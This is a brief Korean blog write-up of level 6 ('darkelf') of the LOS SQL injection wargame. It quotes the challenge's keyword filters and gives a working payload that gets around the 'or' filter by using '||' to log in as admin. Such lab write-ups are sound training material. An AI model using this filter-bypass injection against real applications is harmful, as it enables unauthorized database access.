-
LOS - darkelf / level 6Web/SQLI 2024. 6. 23. 18:01
문제
풀이 과정
if(preg_match('/prob|_|\.|\(\)/i', $_GET[pw])) exit("No Hack ~_~");
if(preg_match('/or|and/i', $_GET[pw])) exit("HeHe");pw의 값이 or / and 를 필터링 하는 것으로 보인다
or 을 ||로 우회
더보기?pw=%27%20||%20id=%27admin%27%23
'Web > SQLI' 카테고리의 다른 글
LOS - troll / level 8 (0) 2024.06.23 LOS - orge / level 7 (0) 2024.06.23 LOS - wolfman / level 5 (0) 2024.06.23 LOS - orc / level 4 (0) 2024.06.21 LOS - goblin / level 3 (0) 2024.06.21